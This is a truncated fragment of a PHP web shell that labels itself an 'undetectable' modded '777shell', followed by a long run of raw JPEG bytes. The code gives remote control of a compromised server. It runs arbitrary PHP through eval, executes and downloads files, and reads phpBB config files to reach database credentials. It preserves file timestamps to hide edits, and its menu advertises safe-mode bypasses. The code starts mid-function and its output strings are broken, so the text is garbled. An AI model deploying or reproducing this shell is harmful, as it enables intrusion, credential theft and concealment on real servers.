if ($parsesort[1] != "a") {$y = "".trim($head[$i])." ";}
}
$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo "";
$line = explode("",$line);
$line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
$line[2] = intval(str_replace(" ","",$line[2]))*1024;
$prcs[] = $line;
echo " ";
}
}
}
$head[$k] = "".$head[$k]." ".$y;
$v = $processes_sort[0];
usort($prcs,"tabsort");
if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
$tab = array();
$tab[] = $head;
$tab = array_merge($tab,$prcs);
echo "";
foreach($tab as $i=>$k)
{
echo "";
foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "".$v." ";}
echo " ";
}
echo "
";
}
}
if ($act == "eval")
{
if (!empty($eval))
{
echo "Result of execution this PHP-code :Execution PHP-code "; if (empty($eval_txt)) {$eval_txt = TRUE;}}
echo "";
}
if ($act == "f")
{
if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
{
if (file_exists($d.$f)) {echo "Permision denied (".htmlspecialchars($d.$f).")! File does not exists (".htmlspecialchars($d.$f).")! Create Viewing file: ".$t[0]." ".$t[0]." ".$t[0]." + ) |";
}
echo "Information: Path ".$d.$f." Size ".view_size(filesize($d.$f))." MD5 ".md5_file($d.$f)." Owner/Group ";
$ow = posix_getpwuid(fileowner($d.$f));
$gr = posix_getgrgid(filegroup($d.$f));
echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
}
echo " Perms ".view_perms_color($d.$f)." Create time ".date("d/m/Y H:i:s",filectime($d.$f))." Access time ".date("d/m/Y H:i:s",fileatime($d.$f))." MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."
FULL HEXDUMP "; $str = fread($fi,filesize($d.$f));}
else {echo "HEXDUMP PREVIEW "; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
$n = 0;
$a0 = "00000000";}
$a1 .= "Base64 Encode Base64 Encode + Chunk Base64 Encode + Chunk + Quotes Base64 Decode";
if (base64_encode($encoded) != $text) {echo " (failed)";}
echo " HEXDUMP: [Full ] [Preview ]Base64:
[Encode ]
[+chunk ]
[+chunk+quotes ]
[Decode ]
";
}
elseif ($ft == "html")
{
if ($white) {@ob_clean();}
echo $r;
if ($white) {N3tshexit();}
}
elseif ($ft == "txt") {echo "
".htmlspecialchars($r)." ";}
elseif ($ft == "ini") {echo ""; var_dump(parse_ini_file($d.$f,TRUE)); echo " ";}
elseif ($ft == "phpsess")
{
echo "";
$v = explode("|",$r);
echo $v[0]." ";
}
elseif ($ft == "exe")
{
$ext = explode(".",$f);
$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$rft = "";
foreach($exeftypes as $k=>$v)
{
if (in_array($ext,$v)) {$rft = $k; break;}
}
$cmd = str_replace("%f%",$f,$rft);
echo "Execute file: ";
}
elseif ($ft == "sdb") {echo ""; var_dump(unserialize(base64_decode($r))); echo " ";}
elseif ($ft == "code")
{
if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
{
$arr = explode("\n",$r);
if (count($arr == 18))
{
include($d.$f);
echo "phpBB configuration is detected in this file!Connect to DB ";
if (!empty($white)) {@ob_clean();}
highlight_file($d.$f);
if (!empty($white)) {N3tshexit();}
echo "
";
}
elseif ($ft == "download")
{
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".filesize($d.$f));
header("Content-disposition: attachment; filename=\"".$f."\";");
echo $r;
exit;
}
elseif ($ft == "notepad")
{
@ob_clean();
header("Content-type: text/plain");
header("Content-disposition: attachment; filename=\"".$f.".txt\";");
echo($r);
exit;
}
elseif ($ft == "img")
{
$inf = getimagesize($d.$f);
if (!$white)
{
if (empty($imgsize)) {$imgsize = 20;}
$width = $inf[0]/100*$imgsize;
$height = $inf[1]/100*$imgsize;
echo "Size: ";
$sizes = array("100","50","20");
foreach ($sizes as $v)
{
echo "";
if ($imgsize != $v ) {echo $v;}
else {echo "".$v." ";}
echo " ";
}
echo "Can't write to file! ";}
else
{
echo "Saved! ";
fwrite($fp,$edit_text);
fclose($fp);
if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
$r = $edit_text;
}
}
$rows = count(explode("\r\n",$r));
if ($rows < 10) {$rows = 10;}
if ($rows > 30) {$rows = 30;}
echo "";
}
elseif (!empty($ft)) {echo "Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS. Unknown extension (".$ext."), please, select type manually. ";
foreach ($k as $u) {echo $u.": ";
}
exit;
}
if ($act == "about") {echo "Undetectable version by ";}
?>
::
Preddy's tricks :D
Php Safe-Mode Bypass (Read Files)
Php Safe-Mode Bypass (List Directories):
:: Make Dir ::
:: Make File ::
:: Go Dir ::
:: Go File ::
--[ 777shell v.
Modded by Don
\FF\D8\FF\E0\00�JFIF\00��\00\00�\00�\00\00\FF\DB\00\84\00 �����������������������������������( ��%���!1!%)+...��383,7(-.+�
�
�����,$ $4,,,,,,,,,,,,,4,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\FF\C0\00��\00\A8�,��"\00������\FF\C4\00�\00\00�����\00\00\00\00\00\00\00\00\00\00\00�������\FF\C4\00A�\00�����������\00\00\00\00�\00������!1AQ"aq\81\91�2\A1\B1�BRb\C1\D1\F0�3r\82\E1\F1#S\92\A2\C2�c\A3\B2$C\83\FF\C4\00��\00�����\00\00\00\00\00\00\00\00\00\00\00�������\FF\C4\00/�\00����\00�����\00\00\00\00\00\00������!1�AQa��2q\81"\91\B1\F0\C1�#B\D1\E1\FF\DA\00���\00����\00?\00\F8j�\84\00!�@��\84\00!�@��\84�&\89\AE�\BAž��@%\DE\C8\FB^\E9\D1\DEjIg\A2-\E0\CFB\93\9B+\8D\C7E\C5�G�\BA�\98\84e1\97\92\EE\00\80�\AEl\94\A1:F\FC0<
j\93G\D8�6\w\B4\DE\C7p˘F�d\84hs\84nj\9C\E8n\E5'\B4\F3\B6\EF\E9J\80\B4\AA\C6\F6\8C\8B��[\DA\C3\FCP\EFp�\CB-t�4\A5��\DDg\DA��2\9BG3!\CDp
���\83\B0\D25sy\DCG\9A\A0���\D6� ͙\FB\C0x�\D0\C9 \EBp\FA\E4\80+R{evy\AB\E8\F0\AF\99\C0Mǀ\FDn櫔\E6\E3\F55̒\DAʗCU\8C\87\D4\E1\F5\BDN8
\D9�\FA\C7~\81���1r\89&��M\B4\EC\FB\AD\D4jwy\A82 +\A0\A0\DFE@.\B9\B2L8�\F1=EK\F7㦈Ge�\A4��J�H��\BB$�\C4.\A1\00E�B\00�\84 ��B\E0��\84\00!�\A0 �Y�1i\BB\98ȨYRm\CAI3\8C\D7sY�^l\BCz\C7\CA&\EF{\AAʤ\D1\DC\C7Yp\91�;\C1\CC'(\8D�\82\D3#\BF�\B0\C8!\ED\B0\E6\CFv�o\86\C7�\B9Z\E2\A5\F7�\F1|7\8F#˴\A7(\EE\96мf4\FD�\91\AAW�i\BBM\9C\81ߣ\86E'��\97_vS9��\A2\A2\E3\D9g\89�\AE�\9DE�Ooq\DF\DA}\93\F0NT\CF��\8E�\90"Y\BA�\EF�\BCb?D\CD�\8CfXE\EE�ÄA\EE\9Fk0\93\8DF|�\8D{2\DAi\D4�\8CƠ\DCB\8FL\E2\96\E8\E3̥\A1\D4h\EDp\BC\C3s\�Ni\BC��y\A7\AB\8A�e�>�qű\A1~�\9Bl�A�a\DE�\ABf\B4\AB\DB��cB��q
�\80/\8D�\8Bg\DA7u\AD\CAڢ\8F\DB\D1�
\DD\EA-\ED:\D1\E2\DFhke\C1\AE\FE\A5E\B3P䶧\E2.;3�A�{\C3E\CFl:T-�;.o\F7\CFu\85\85I\A2�E{4\B6� �y�\EB\AAy4\C2k\EE\EC\A2:�\8E\90i�\99\FC\AF�Q\F4\AA\81\FF\00\999H\B8m
�`\87�\EAc\BA\AE\EFD\E3�\CF/��\E0O\FD\C2?\E3'\E0\9B\A5Q.`����\BAЪ(6\A8\CE�D\9F\FC1�\ACZ�\DE]x\86\C0?\A4|©ڳ\81\C8Q\C7\ECyh\D0,\C3>\F1ky
\A3\E4�_f\EE\B7[\CA٬\A8\F7\C3f\EB]]/&�\AA\FA
\^\E7�{\BC\AF�r�\F0P\F1p?��i\BF\C7\F9f0\85a\A6&}\D6q\96<\84\B9\B9SWP\EDN#\C6\C31\F7\89\EE\B4q>�O\D6\E2\DC^ͷ\86\EC\89fg\B4y\B8\9F�\AB
\87&\B5\AD�\D3&\FB\D1N.;\80\F2V)\91Z<\BFe\FC\98\91\A8\E5\CE$㋎M�4it\95�\9D\99\00/8
7\9F\92ۥ\B1\B0ۨ�\E3\ED\BF7p\9E�V�I\92u8\95dy9m{��lX\99ay̪\EC'; ��\88\E7\994a\8E@
I\C9X\B9�\95�\F2#%6\C1&\FC\B5Z�\85
\9E\FB\BF\B0p\D5Q�n\C6\FD\C3�%\C9���\8A\C8ez咚�`\A5\D9kr\B5W\EAG\C2lV\C2,�y# \A3\B4\BB\85\E4Eօd\89+,\AEYQ\F0\99NHI
vQ%\CF
\86H\A2JVWl�%\00\C9 "JrRh�\C9w\C3G2We�Z�h\E4\E0�\B8H\9E\98\A6�C��[\B8\8F\9A\E6\C4U+\92�\A1\80n\B9\DE\EB\AE<\8E\A9\EF\F4\B6\9C i\F6_wG.:\A7\D3\C1_G�\88w�i\BE\C9\DA�\D2Wq\8E\C5\E7r\97\D1"\8F\F4Ô\DE%\C7�\F3Z\94�n��e\D8��$\DD_YC;/il\F1\B2-7\9C'_\CC�\AD\DA=E�(\B5�\ECt\B1l\E7. \ED3\98\96\F5\C78\AE\C4\ED\B6o\86\B93\85�\EE6\A1l\C6�j�\FF\00\F6
�N\E3\8AN\91D\83H\9EɃ�\B79\A4`ts}f\EF�\D2@\80\E8dC\8Cú\DD\DC\D9�O\E2�u\9DF"\00\E7\83pَ\D1\FCF�\80x\F5\9B\96$�\DCF k/\D9\EE\89\E9\FF\00\DC\F6k\FB\C9\E1a@-\FE�q /\87��ؾ\E75\F9\C3\C2\FC[\9AݢU\BFh&�]\98\FD\E6>WE\90\B9\ED\FF\00p�'7\D6o%k\A8O\86C"\80\E6�6\B8L�F.c\8D\ECp\CCe\81�^\B5\E8UH\B2�I,�p\E2
\97\C1x\BE^\E8�\E59\89\B4\90�\B3S�pǡT\B7r\8F5\E8\D0u�;\A8\F1ņDpi&\FE\C63o\86\F1\ABp\E2\D7��\DC
\AB촛Vv/%\B8\83G\8A\EB1\A1\EF�\DEL\8F\B2\E5\B1\E9-\00\C6kcDh1!\81
\91!.ѓ؋,\9C�B4![T�@C\89\B6\E8"\D3I\FF\00\D9�\B6O�\EDC\CBV$\EDԩ\C1\8E\D1L\A1fO1[Tv"8c'�d\EA\C7\CAú\88|\DCS\B5\F5T\E3�\8F"\F7Æ\F3\F8\DAl\C4\F2y^\96\99@\9B\\D3{\848\90g\990\F6@\F0N\FAAe\E2�I{3\E0\F6\89\F9\9E\A9Z\B5mÞ\D7�\A4t\C9\DB\C7O\93\C1\FA)V\82ǶY\CF\FB�>(\AD`ȼ\E4絜\81\9F\F8-\BFF[b\DC\F3\F8^\A8\AC �\D9O;Q]\C06_䅨\CC٩V\97\84\BEǑ\8FG\B5�^\C8�\A3Gĕ\A8\F0 \C1q�\E9Yn\F7:\E0y\00O\E6Q\AB\DB8\85\C7�\E1;ϙTWQmpl\E4=\E7�\BA4�5f\E9`\D8\F9}\B01*\A8�v\BA|ð0\00e\AC-��\B9\99\9E'�\95OD\B4D\EEn%}sM�a\BD\D1w�\AF\ACSp\9Ey*\96\9DB8<\F5i�\BD\D7`.h\D0%� 8\A6\DE%yĩA\84;\CE\FD\D5\EA\C1/\96̲\FB\FE�\A1P\E7\B4\F3&\8C\F3;\86\F5\CAU"\EB-�Y\EC\8CN\F7�ʲ\91�\9F\80\C8*,fz\A6!\96)l#�!\FB\8B\88s\F9+;012ݚ\91\89\ECݽU㼦c$\BA�q\8A\F78_\EC\89o*\A2\CDLՎ*\A7DV/qk�\F38G%\C9��DP\99Rȳ\9A \A4ö;�\DE\C0+\B64#\E2"\A6\B8f�\ADkNg\9A\EFق\B1\B4s\AA\EF܃\9A\F58(\AD9\8F%1@9�"\ACd'nW\B1\84d�[\89L\ACk\A6+\F6�\83)\A9
!͋R\8F��T\F2+N\8F�h\E5T\A7�\E6-f\A6q\F2<\E4:�w\B4\F3�R\8A\D8\CD\C1\C1\C3C\9A߂�q�\A0+F\8DV\C1q\BC�\F9O\C0\A5g\A8\DA'-k\9B\C6�Z%%\83\EF \81\BD\84\B3\C0]\E0\B7h\B0hqn3k\B2q�\E5�\FE\ADZp=�\84\EE\ECW�"\EF�\9Eg\A2:�;\94\8F\9Aλ␉(i\EC\9B\CAFLOB\84Fͅ\91F\93\93\87�\B6\FE\A1 \EFD"\B0\87Cqk\86
\88K]\FF\00\CE3n\E4d\BD\95�\A8\8D�\8B\A7,'\8E+j
!Ҕ@y\ED�\B8\F9\AC\AB>9�\F0\CDz~�\DA\F3��\81\A8\BCp\B9f\D0h\E6��m4\E0u�˴#\F6\BA`z\DA,|\89\B5,��qФ\E94f\87�7�\DFo\F97EJ\D69r\8D
\EAX\DB$Y�\82\C76r\9BH\B2\E1\AB�\96�\8D7nj\C2}X`\B8�\E4\BE@\EB
\C6m\E4�\B9�\BD� \FD\99\97\AA\EC7�\92\95)\ED-sNbC\81�\C8\F3
\D5n垉B;e\8Eя�\A0F\BB�!\BB\94\AC\FF\00\D6I
\C9ӆ\C6\E8�\E1h|��k\DAg\83�\81\97\C9+M\8D'3s~'敌\E4\9B^\A6\CD4\E2Q\F6�\A3\8B6Ƃ\\C8
TV\8E\9B\9C4ka\8E�\BB\E4\AE|P\D7�\E6\D1\DC��5\9DK\A4\CAӎ.\C3p\D55Sy4\EA\AF2\CE�\E6�3\DFw\CF䲩\86\DB\C3F�$\9E9\A6\A2D\C4\F2��\83�y'�\F7\EEZ5G�\9A3\8A\E8q\D1C[\B3\98\93x�]\C4\F9,ا[\F4�ձcO\89\FA\B9*\E7M3�\8B\DA\E2\B8Evo\99Q\8A\EEgM�\\FD:\E4�\D1"\CB�g2\99\87�]\D3I`\8B\DD-\E5P\F7\FE\CAMa8a\AA\B4Ckq\BC\E9\F3)\A8fFl\93\97\B2(l2T"8�/\E1\87Us\ED;p\D0`\A2a\B4bz&c\84+87\D7^\ACU\C0\94
:\B5\D1\F4��K\DC⧼RP\82\F7:a�\9A\8Eʬ\F1P\98F\F2\96ò6D\B4V5\81k\B6\A5?@\AB\E1Ԏ\FA�j\B3\CAKWZ\F31\9B�+\E1\D1w-\E8��\FA�F�J�\A6q[5\F0^g\99\85W\93\EA\A6\E1\D5$\E4�\A7\87V4+\DB@�,\EB\EDڻ�\9F\C4}�2ʘ\E8\D5{*\A3\B9z6P\B7&\A0Uo'\BAW\9D\D6k\DC?䊖\AEɼG\93\CF\D1ꈇ \F5[\95}U�b\E7u\9AܢUa\BF\A9M9\81\BA\F4%y\EB\BE%d\F8L\D8\D1\E9\A4\DE\E9d^\8DEp\C5\DEKB�Z1r͌\EFt\F8�\94S\BB\C5&\D4\EC힟OR=S#�\83\FA\85'E�B\BC,X\92\CE_\98\AA\85h[\83\DD\FDS\\F9�\F9L٫O'\D1\EC\A9��\8F\AE)^\D3\D9>+ζ\B7\8A\EC���~\89h\D4\D8\C0̰\8D\E0�uV\C3G.\B2iU\A5o\B3\D4�Y\9C\9D\B2\EC\9C?\C8|T\A1R\DD9�u�|�E_L\ED�\F7\EE7\91\C0\85\E9\AA\DA%\A1~]S\FA]&^$\8A\AE\8Cj\\A2\F0\D0\E6\CE\G\84\FE\B4IҘf7�\8A\F4�(BJ\8AU�^\B5^\8D$gCQ�,�"��\A8\84\DC\00p�\DD5\8DM\8D\B53\80\95\DA˺8\92\BD-o� \DD!\A7\92\F3\94\EA0�nu\F2\99h\C4q9$\A7N\D9\E4\F4ZY\A9~\A6#�$\9A^\F3\8C\CF�\C3w\C2K
= \BC\92s\C0h5W\D3#\DB:\81s@Ö\A98\8E
\99q\E5\9Af\AA\F1\F76`\949eQIu\D8�\E0�\91\9E��\E2\A3�\90\E7`$4\F9\AA\9C5\BC\A7c�v/e\D9\FAp.\9D\E6� \A6擊\E7e=\C1\\B0\84\A7\BD\F4,I7�&\C0\CC߹2\D8`(\BD\C0))\FA�\BA�\E6er<����b\C7JD\8A\98\8C\98\9D\D6\C2=r]�9\CA\E4\A4H\83\8A\8B\8E\AA\B2\E0\AEFM\D79vu\CF<�d\EF<\97�\F7(\92TЌ\A7\90<�&\B9"\89)�6}\85\95[\BF\99\E1\FA&a\D5g\F9\87\90\FD�m\A7?\DA\F0j\B5\B4\97�\CF\D7%\A3;l\FE\B3泶\DFo\EF\E0\AE
\�n<\93\8C\A2�\91\E6Um\88u#��\D6u\F7X+9M\97\88Cr\93�F>K>-=\83\D6�6\91]\B0`f\B05vZ\F8D\EA\A2\C6\F2\91\EA�b\D6\E0�\F4\8FH%\90^6\91^\EF\97�\96=&\BF\9Fvn;\B0\EAV\~�;^d\8D\8A(\D5>\9E�\EE)�\95D��9�\8FJ\F4\D2 \F5漝\B8\B17x\95\ABU\D4�\AFp'\8Ac\E4\B4\F5,\CF�\8D:w\BB�\9Bo\EE\\FF\00L)�\EE\B4q!�\E9\F4عˀ^\92\85R\B1\BE\A8\F3Z\90裇�\BC\F5TC\E8\82=V\8BM\B5y\FEO+�\AE\8Eoyw2�աջ\87R~�lA`\D1F-!\8Dā\A7\EC�\B3\D5N|$z�!\82\98un\B6BԡC\B3\EB6_\86~j\98p\F6m\BFa\BA\BA\EE\83�\9D�\B9\82
\C6\D7�\F8%\B1;8C\8A2\B1mG\A2t��3\B0-jۼ�۫X\00Ϛ\F2\B5utۃ\80h<\8C\B7\AD\BA59\93\D9t\DA9��\A7\A3\93\87�f~\A6\9B�\DA\F2z\98O zk\84\96ck6\EB5M"\9E�\C4-\B7r\DAf\C3M-\D9�\A7\C3$\E08\95\E5\EBz\00\94\8B\80n2�\CC\EAu[5\85'�\82\F3t\8AC\C1\BF
\EB2\E9\F3\C1\E94UO\D4Ħ\80وl38\B9\C6d\F4\CBrDt\E6\E1=\D8�\E9i\91\83\B1p�\82ʊ\E6\8D\EAuY#z\BAԗ\EA3���\80
\B3��\D4x\EB>5'@\9B\86\E6r\E7U}\93 *\A2D�)�\90uK�N\F4\CCj\F52.\D7%\C4�\CCJP╉�\95߳\B8\E3r\EF\D9Fe1
\FD�\EBl\BA}\8B=\EA�\93\82xAѤ\A8\BA�\B7�i\A8P؍\91k\B6"a�\D4�\00M:�\AE<\82\A8\C1n\9DH \B8i&\FC\8C\EBg�.^��\D3E\83F\F9\AEY\E1\D1]\F2r\F3b\B2\B9
̮&Kx\F4\\B3Ǣ\E3\D2{\90\F1�\A0\9FKۨU?\D3!\91\E8�\82
V4h UI\99�\E9:e\E4{�\BE\988\E1>\BF$\AC_Hb\BB;+ϵ\8E\DC�\8C\82�$\B8\A4\AD\E4\92\D1i\E1\D4Q\A1�\B5'�9\C7r\81\A5\C48l\F8\95m�\ADy\C84x\ADZ=^\D6\DEz\95\9Dd\E1�\B9\즾\91\93�\82\E7\9B\E6x\AD\9A�O\ADɘE\A3\BA��$\AFq\92N\DB\E7.�\95ڛ%\C2\E0n\81D\86�\00Z:-\F6Y`\DA {\AD^Mյ\91!p\D0w\8F\D6\F5m�E\8F2\�
\BD\E7\93p\E7\99ܑ\B6\89K\F5I\E1�\E87/.OLk�97�\00�\92\A8\AC+V\C1\FB\C7I\DF\CBm\EF\E7\A2äWM`0蠌\9D�\DD\F7~�d(Դxm&,c9s%\DA
J\ADic�\BAK\F1\E6\FF\00\E8\F6�J\DF�7*\F6Ǐ\B4\84ί=p�ROR\E9ph\A0�l\ED#8L�f@\F6\9C\E3\80賾\DE\F7\EDwY;,h\C5Lj\C8fy�2\8A]"D\ED\99�\9CB1'F�\D9T\EB\CB\FD\/E\FEY\B7�Ǧg\C7�i�\B7�1\B01\B3sF\E6�\8A^\93Ihل\C9�\9C\F6\9D\BC\9Cd\BDS*kd2w�\F9��\B8$iT�\DA\D9h\C06{\812h\E4�*\D8_�\F1\E5\E9\E49UЋ3hD\8D\B7 5\B7~'\9C&wb\B6#S\DA\DA<\C13s\C5\D9ټ\8F�\E2\A1Fk^��vc\9D\B7\D9o\80=Ve*\8A_�\B7�\DBY\E5"\D6\FF\00\D5Y�\99e\AE\8B�\E3l\BFS$\DA\E9\C1\EE3p� d.L:\B8�Fӌ\F1�\91�V\EB\C1U[Ն\8F�O�k\84Ǝ�a\E0oǢ~'\A3M\D9\00\87B\8A�\86\F0e)\89\8B\F5O\BB7%\C1F\CAa%%.�"�\98\CDx\BC\93\BC��"Y\AC*I-q\98s\86Srԥ\D4\F1\A1:F\F1=\97k\A0~\87~j\B8P\83\8C\8E#�\9FERM3R\AB+K)\98Q\A3�\A1\94\84W\9D�^\C8\D5�\EA7\8B\C2̥UO�\F9M1Z~\84m\BA�\E1\CC\F3�\BF\89�\88\D0\F3ZQ\E0�\89�\88!*\E6\FB\CD\EB$\E4+\9C\8C\CBgL9o%����ۗ_�\EBХc3yOՠr\E5\B3&\FF\00\8B\D7_�E\EE\88Ъu/A\E4\93s�\BC\A0e\BDjU\A3\AE=\F2d\DB\F1\9B\A7\F4\F1\F8�tW\9C\C0\F1P0\B5K\92\B3\FA\BDvRO\C20\8FHͲ\EB\AC\FA\A4\C6;(z\CDs`e\E0\97.?AD\B8\EA\ACrKȧc}\B1\93�\B9��Y\8D\F5r\\93\AA\E1'UT\A6I@\B8\C6Q\EDU3+\93T9\93؇Y�\E4��\E8\AF8\90�\9Fk*B3\8F\EA\B2gw\A2)\94fhC\A2\C3�\E7�pMä1\BD\D0�\89Y�\99\C4\F4M2Mā\E6\B3픥\DB\FD\85\E7^{y5[K<vE\E4f\EE' \9E\ED��\E9ل̅\CD�\B3):3LSe\BB0\DB{\9Cqt\B3q\D3rn,k[�\EEc|w\94\B5\9FW\BF\F1\FF\00\A6\9E\8A\B4\B9,\87
\D9
`\BB
\E5l@\ABF/2c�\DEF
nMn\AE*�U�\B6\CBG\DED\00\8Fq\87\D6;ݖ\EB\D3�\A9�+\C48wÆd�\BF\B4\89\9B\B7\81\80IY)g�\A3z\ABT~\E5\F0�\B2b#y\00!\B4yt^�\85Kg\DA"\C3wu\F0^\DE`\B6ωLi\B4k/\8F\EA \F5X\91\E8\AA�\D6@�\B8�Qb7x�q?\DC�\91\9D\FCW\B3�\F7<0\FF\00\B8�\8B�\A8q�\81Z\B9\A2\C9?w��\BF\D8c\9A\E9xE\E8\BDx\A3\B6<�q�\E4\F2\D6\CD\C3�E\82K��rl\8F%\AA\B4YY��q\9Fct\DA\EA�)\A2�\8C\83\9AÓ\9C7\E0H\DC��\F7?r\ED�4Xp]
\E0Ʉ\DBhŎ\C6\DC=ZM\F2\C4d\BC\F5oB/\86c\C1\00D\86\E2bC���\BC�^\A9\B5?\C2\F1\A2\9C�I\A7�bb\E0ȓ\BD\CC-\C1\C4g,�\BAG5}:L\FD\CEY\F1��<\9F^\CC\D1\FF\00[\88\CCv\D8\EC%x#2\CD\FA\B0ߦ\89jqd`�9=\86N�\8C\FE7\AC\A6R[�\C44\B5\91M\E6�\AF\83�{L:\F0\BDr
\B5\D3l\DA\EC\DA\EB\EDq\F6\F8\F7\B8\A7\E1\A0O\9C K\E3�\83\DA٧E\AC)�\FB\AFl@=W\89;\AA\B2=|\C3\F7\90\CBw\81hx_\E0\B2cG\B5\DD\D9v6�x?\81\D8\FD`\B3\E3V#�\8B'\DE\C0\F0xǚn\BD�k\B1[>-{\FA^G\A9\94\86\BB\B8C\86\81\C2}�\8A\F3\D4ا6\B8q \9AAi\FDo\F1Y\91\E28`\E3\C8\DDЦ|�C\A2\85\AB\B6\CE\DE�#1\87?�C\A0\E8\E1\E4\A7�\94s\00\F1��\A8tQ\A4\B8�̤^\94\BCΐF~*&#\94K\94f\8D\FE\8C\9AE\9D\B1GjUk\8B\BE,\97\99ݨ\B3\B5\\ED�
A\B5�[\\B4\A0\89\AA\DD\CC\EE \DAE\A5 \A2j>(`e\A7\92\97nѽ'5&\AC\E7�\91p�\FBS\B2\B8.�O~\F2\A9l\94\BBp�6\FA";}�\CBY\99*F0�uH:9+\8Dt\D1\E1\FA\9C\F0\BDM�O\99\FA\BB\F5Z�\8C\E4ч\D5\E5g@l\82\B8Fˬ\B1;\82\A6q\CFE�\8E_�\A0\85�`1\9D\CC\CEo#]\C19
3X\C3�\C2ld\83[\FCȇ\BA8f}ѽcP�\l _\DE84�|\A7\90�\92D:\9C\D8\D1E\E4@\A3\82\E9\E1\F8\9EG\B4\E3 �\E1�%|�\BFb\F8ͥ\84nG\AC\9D
�\C9\FE=.s9\B2��;\A72��nN\D5Ա�\8F\DA�\9C\E9C\83\F8\DF\EB~V\82\EE\8B\C2\FD\B5\D1\E3��\AD�\000d&\E0\D1\C0\00�\BE\91Vf\DBa7�-\97�\91%>\80\C9�\D2'%�\CB�\85\8Drzڞ\95\DA:�\87u\96\A2\00}\964\F6`\EF.
\E6R\D5\E5kg\B5h76P\C7\F5\86�\CE˺\A5j:``#G5\9C\A1\C9\C7ŋ\CB\D64\DBS>\D1a\E7h\B8\F9\AB\A8\D3,\B6U+\\A4z\BA\A6\B8?eh\9D\C6?\C1\C4\F8\90\BC\B5*\98D{C6\BB\C4�\88
�ZL\A8\BC#�\FD\AB2$Y\90tL\D3R\8Bl\94\9B\93=�X\82\D3]\88\9B\9A\E1\AB�x�\DA\E77\F3�\A5V֯\86\C0-}ۋ�\A4\8Fu\C7q\FF\005\81F\8C�\00\E0E\9E\98xy&!F\00ߘ\EC\E2
\D9�\89\FA␝\B9k�\A3\A2ׅ\91-\DF#\B1�\98\EB+\B9\99k7
�T\966ݨfE\F7\B6X\A8\9FL\B9\99%`F&%\A7_yy\E5z\8CGɀ{W\9E��\89T5\D8\EF\B9qG\96\FDN\A4l\D0\E9\840߃b�e\86^.YQ\A2O\C3\C1M\AE\D8w\00:\BA�\BCԒ\C1�\C1'\91\B8o\FE�\87\BE\C3կ Ec�s\86\B2\F0\FD\D5K\A4\D1t(\B2�\E68\84Ф\E0\E1\C1\C3Q\FA$�\98\F9)\A9�pL؊\F0\E6\CFA\966~c� ��D\87`q\F88oP\A3Dze\96K\94\9DF�Z\85d\A7\95\92�\86\DE�\DBJ\BA\C3\EF�\AB\92\91f\D3#\82\AA\DD\D2\\B5\92\E3\B3(\94a\81\96\D2's\B9;>z\AA\A22Xr\FD\D5K\A1\CA;\F3\D9-\B8軷\9Dο\DE\CF\F5U\BD\BA^��5\C7'\E6w��\C4!@\E8!�@��\84\00!�@�B\E2�@\EA�\84�\C4!�\80�B�\00\84!\00XȒ\C3�T�\84�\C5&
pB�\00\F7N\F5�!\00XM\DCL\FA(.!\00vk\88B\00�\84 �\A9[B�@\8A\E2�\B8\00\84!\00�B�\00\84!\00�B�\00\84!\00�B�\00\84!t�\A1�@�\FF\D9
